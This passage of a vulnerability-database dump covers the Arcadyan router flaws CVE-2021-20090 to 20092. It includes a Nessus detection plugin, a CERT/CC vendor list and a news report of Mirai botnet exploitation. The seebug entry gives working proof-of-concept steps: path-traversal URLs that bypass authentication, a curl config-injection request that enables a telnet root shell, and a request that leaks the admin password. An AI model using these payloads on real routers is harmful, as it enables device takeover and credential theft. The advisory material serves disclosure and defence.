Vodafone | EasyBox 903 | 30.05.714 |\n| Vodafone | EasyBox 802 | 20.02.226 |\n\nProof of Concept:\n\nThe vulnerability exists due to a list of folders which fall under a \"bypass list\" for authentication. For most of the devices listed, that means that the vulnerability can be triggered by multiple paths. The simplest examples would be:\n\nFor a device in which http://<ip>/index.htm requires authentication, an attacker could access index.htm using the following paths:\n\nhttp://<ip>/images/..%2findex.htm\nhttp://<ip>/js/..%2findex.htm\nhttp://<ip>/css/..%2findex.htm\nTo have the pages load properly, one will need to use proxy match/replace settings to ensure any resources loaded which require authentication also leverage the path traversal. Additionally, certain files (those found under /cgi/) require a csrf (named httoken on these devices) token and a valid Referer header which will cause an error if the referer includes the ..%2f traversal (which can be match/replaced as well). \n\nCVE-2021-20091 : Configuration File Injection\nCVSSv3 Base Score: 7.5\nCVSSv3 Vector: AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\nThe web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.\nProof of Concept:\nThe injection occurs in parameters which pass from apply_abstract.cgi to the device's global config file. Assuming the user is logged in (or, alternatively, the url can be changed to /images/..%2fapply_abstract.cgi, leveraging the path traversal), the following command could be used to inject a line into the configuration file which enables telnetd. \n\n```\ncurl --include -X POST http://<ip>/apply_abstract.cgi -H \"Referer: http://<ip>/ping.html\" --data \"action=start_ping&httoken=<valid httoken>&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=<ip>%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\"\n```\n\nThe %0A will be interpreted as a newline when the ping address is added to /tmp/etc/config/.glbcfg. When rebooted, a shell will be available on port 23.\nCVE-2021-20092 : Improper Access Control\nCVSSv3 Base Score: 5.9\nCVSSv3 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\nThe web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.\nProof of Concept:\n\nTo get a valid httoken, navigate to http://<ip of device>/loginerror.html in a modern browser (tested on chrome).\nOpen DevTools\nRun getToken() in the Console.\nCopy the token, and use it in the following command from a terminal:\n\n```\n$ curl --include \"http://192.168.11.1/cgi/cgi_i_filter.js?_tn=442853667\" -H \"Referer: http://192.168.11.1/loginerror.html\"\n\nHTTP/1.1 200 OK\nDate: Mon, 13 Jan 2020 15:24:03 GMT\nServer: Arcadyan httpd 1.0\nContent-type: application/x-javascript\nX-FRAME-OPTIONS: SAMEORIGIN\nConnection: close\n\n/*DEMO*/\nvar login_password = \u201c<admin password>\u201c;\n\naddCfg(\"lan_ipaddr\", 0, \"192.168.11.1\");\n```\n\nSolution\nCustomers should seek update and mitigation information from their respective vendors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-11T00:00:00", "type": "seebug", "title": "Buffalo\u548cArcadyan\u591a\u6b3e\u8def\u7531\u5668\u8ba4\u8bc1\u7ed5\u8fc7RCE\u7b49\u591a\u4e2a\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "modified": "2021-08-11T00:00:00", "id": "SSV:99329", "href": "https://www.seebug.org/vuldb/ssvid-99329", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-26T14:27:33", "description": "Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-08-04T00:00:00", "type": "nessus", "title": "Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "modified": "2023-04-25T00:00:00", "cpe": ["x-cpe:/a:buffalo:buffalo"], "id": "BUFFALO_WSR_CVE_2021_20090.NASL", "href": "https://www.tenable.com/plugins/nessus/152198", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152198);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2021-20090\", \"CVE-2021-20091\", \"CVE-2021-20092\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n \n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could \n allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An \n authenticated remote attacker could leverage this vulnerability to alter device configuration, \n potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to \n sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's \nself-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2021-13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Vendor has released fixes for certain models. Contact vendor for more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-20090\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:buffalo:buffalo\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"buffalo_www_detect.nbin\");\n script_require_keys(\"installed_sw/Buffalo WWW\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar port = get_http_port(default:80, embedded:TRUE);\nvar app_info = vcf::get_app_info(app:'Buffalo WWW', webapp:TRUE, port:port);\nvar constraints;\n\nif('WSR-2533DHPL2' >< app_info.model || 'WXR-5700AX7S' >< app_info.model || 'WSR-1166DHP2' >< app_info.model )\n constraints = [{'min_version' : '0', 'fixed_display' : 'No known fix' }];\nelse if('WSR-A2533DHP3' >< app_info.model) \n constraints = [{'min_version' : '0', 'fixed_version' : '1.25' }];\nelse if('WSR-3200AX4S' >< app_info.model)\n constraints = [{'min_version' : '0', 'fixed_version' : '1.20' }];\nelse\n{\n var ver_model = app_info.version;\n if (!empty_or_null(app_info.model))\n ver_model = ver_model + ' (model '+app_info.model+')';\n audit(AUDIT_INST_VER_NOT_VULN, app_info.app, ver_model);\n}\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "cert": [{"lastseen": "2023-05-27T15:38:11", "description": "### Overview\n\nA path traversal vulnerability exists in numerous routers manufactured by multiple vendors using Arcadyan based software. This vulnerability allows an unauthenticated user access to sensitive information and allows for the alteration of the router configuration.\n\n### Description\n\nThe vulnerability, identified as [CVE-2021-20090](<https://vulners.com/cve/CVE-2021-20090>), is a path traversal vulnerability. An unauthenticated attacker is able to leverage this vulnerability to access resources that would normally be protected. The researcher initially thought it was limited to one router manufacturer and published their [findings](<https://www.tenable.com/security/research/tra-2021-13>), but then discovered that the issue existed in the Arcadyan based software that was being used in routers from multiple vendors.\n\n### Impact\n\nSuccessful exploitation of this vulnerability could allow an attacker to access pages that would otherwise require authentication. An unauthenticated attacker could gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n### Solution\n\nThe CERT/CC recommends updating your router to the latest available firmware version. It is also recommended to disable the remote (WAN-side) administration services on any SoHo router and also disable the web interface on the WAN. \n\n### Acknowledgements\n\nThanks to the reporter Evan Grant from Tenable.\n\nThis document was written by Timur Snoke.\n\n### Vendor Information\n\n914124\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Buffalo Technology __ Affected\n\nNotified: 2021-07-06 Updated: 2021-08-03 **CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n\n### Deutsche Telekom __ Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\na detailed List and Product Advisory is being created, as well as fixes.\n\n### ADTRAN Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AVM GmbH __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAVM does not utilize Arcadyan components.\n\n#### References\n\n * <https://en.avm.de/security/>\n\n### Actiontec Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Brocade Communication Systems __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Brocade Fibre Channel Products from Broadcom products are currently known to be affected by this vulnerability.\n\n### Check Point Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cradlepoint Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F5 Networks Inc. Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Intel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Juniper Networks __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-10-07\n\n**Statement Date: October 07, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nJuniper Networks Junos OS and Junos OS Evolved are not affected by CVE-2021-20090, CVE-2021-20091, and CVE-2021-20092.\n\n#### References\n\n * [SIR-2021-353 and PR 1613180 were created for this issue.](<SIR-2021-353 and PR 1613180 were created for this issue.>)\n\n### LANCOM Systems GmbH Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-16\n\n**Statement Date: August 16, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### OpenWRT Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Peplink Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Sierra Wireless Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Synology Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Wind River __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-09-06\n\n**Statement Date: September 06, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nVxWorks are not affect as we do not use Arcadyan-based routers and modems\n\n### Zyxel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-18\n\n**Statement Date: August 18, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### dd-wrt Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### D-Link Systems Inc. __ Unknown\n\nNotified: 2021-08-10 Updated: 2021-09-06\n\n**Statement Date: August 31, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nD-Link US SIRT,\n\nAfter full investigation, D-Link has confirmed that no D-Link product are affected by this issue.\n\nRegards, security@dlink.com William Brown D-Link US SIRT\n\n#### References\n\n * [None Applicable](<None Applicable>)\n\n### A10 Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ACCESS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ARRIS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ASUSTeK Computer Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AT&T Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Alcatel-Lucent Enterprise Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Arcadyan Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Avaya Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Beeline Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Belkin Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### British Telecommunications Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cisco Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Comcast Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Commscope Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F-Secure Corporation Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hitachi Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Huawei Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hughes Network Systems Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Linksys Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### MikroTik Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Mitel Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Motorola Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NETGEAR Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NetComm Wireless Limited Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Nokia Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quagga Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quantenna Communications Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ruckus Wireless Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### SMC Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TDS Telecom Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TP-LINK Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Technicolor Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Telus Unknown\n\nNotified: 2021-07-08 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ubiquiti Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Verizon Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vodafone Group Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### eero Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### pfSense Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 61 vendors __View less vendors __\n\n \n\n\n### References\n\n * <https://www.tenable.com/security/research/tra-2021-13>\n * <https://vulners.com/cve/CVE-2021-20090>\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n * <https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-20090 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-20090>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-10-07 20:26 UTC \n**Document Revision: ** | 15 \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-20T00:00:00", "type": "cert", "title": "Arcadyan-based routers and modems vulnerable to authentication bypass", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "modified": "2021-10-07T20:26:00", "id": "VU:914124", "href": "https://www.kb.cert.org/vuls/id/914124", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:15", "description": "[![](https://thehackernews.com/images/-OyZSMpBc91Y/YRI88ocfD1I/AAAAAAAADfA/3z5jFwd1jb86NrMApn9qnJvhJh69BR5qwCLcBGAsYHQ/s0/router-hacking-exploit.jpg)](<https://thehackernews.com/images/-OyZSMpBc91Y/YRI88ocfD1I/AAAAAAAADfA/3z5jFwd1jb86NrMApn9qnJvhJh69BR5qwCLcBGAsYHQ/s0/router-hacking-exploit.jpg>)\n\nUnidentified threat actors are actively exploiting a critical authentication bypass vulnerability to hijack home routers as part of an effort to co-opt them to a Mirai-variant botnet used for carrying out DDoS attacks, merely two days after its public disclosure.\n\nTracked as [CVE-2021-20090](<https://nvd.nist.gov/vuln/detail/CVE-2021-20090>) (CVSS score: 9.9), the [weakness](<https://www.kb.cert.org/vuls/id/914124>) concerns a [path traversal vulnerability](<https://www.tenable.com/security/research/tra-2021-13>) in the web interfaces of [routers with Arcadyan firmware](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>) that could allow unauthenticated remote attackers to bypass authentication.\n\nDisclosed by Tenable on August 3, the issue is believed to have existed for at least 10 years, affecting at least 20 models across 17 different vendors, including Asus, Beeline, British Telecom, Buffalo, Deutsche Telekom, Orange, Telstra, Telus, Verizon, and Vodafone.\n\nSuccessful exploitation of the vulnerability could enable an attacker to circumvent authentication barriers and potentially gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n[![](https://thehackernews.com/images/-VpbYTZFqKSM/YRJGcZG2KXI/AAAAAAAADfI/G8Fi_k66FRwXnFO9vKQUXyFTF5Cy0lfJwCLcBGAsYHQ/s0/router.jpg)](<https://thehackernews.com/images/-VpbYTZFqKSM/YRJGcZG2KXI/AAAAAAAADfI/G8Fi_k66FRwXnFO9vKQUXyFTF5Cy0lfJwCLcBGAsYHQ/s0/router.jpg>)\n\nJuniper Threat Labs last week [said](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>) it \"identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China\" starting on August 5, with the attacker leveraging it to deploy a Mirai variant on the affected routers, mirroring similar techniques [revealed](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) by Palo Alto Networks' Unit 42 earlier this March.\n\n\"The similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\" the researchers said.\n\nBesides CVE-2021\u201320090, the threat actor is also said to have carried out attacks leveraging a number of other vulnerabilities, such as -\n\n * [CVE-2020-29557](<https://nvd.nist.gov/vuln/detail/CVE-2020-29557>) (Pre-authentication remote code execution in D-Link DIR-825 R1 devices)\n * [CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) and [CVE-2021-1498](<https://nvd.nist.gov/vuln/detail/CVE-2021-1498>) (Command injection vulnerabilities in [Cisco HyperFlex HX](<https://thehackernews.com/2021/05/critical-flaws-hit-cisco-sd-wan-vmanage.html>))\n * [CVE-2021-31755](<https://nvd.nist.gov/vuln/detail/CVE-2021-31755>) (Stack buffer overflow vulnerability in Tenda AC11 leading to arbitrary code execution)\n * [CVE-2021-22502](<https://nvd.nist.gov/vuln/detail/CVE-2021-22502>) (Remote code execution flaw in Micro Focus Operation Bridge Reporter)\n * [CVE-2021-22506](<https://nvd.nist.gov/vuln/detail/CVE-2021-22506>) (Information Leakage vulnerability in Micro Focus Access Manager)\n\nUnit 42's report had previously uncovered as many as six known and three unknown security flaws that were exploited in the attacks, counting 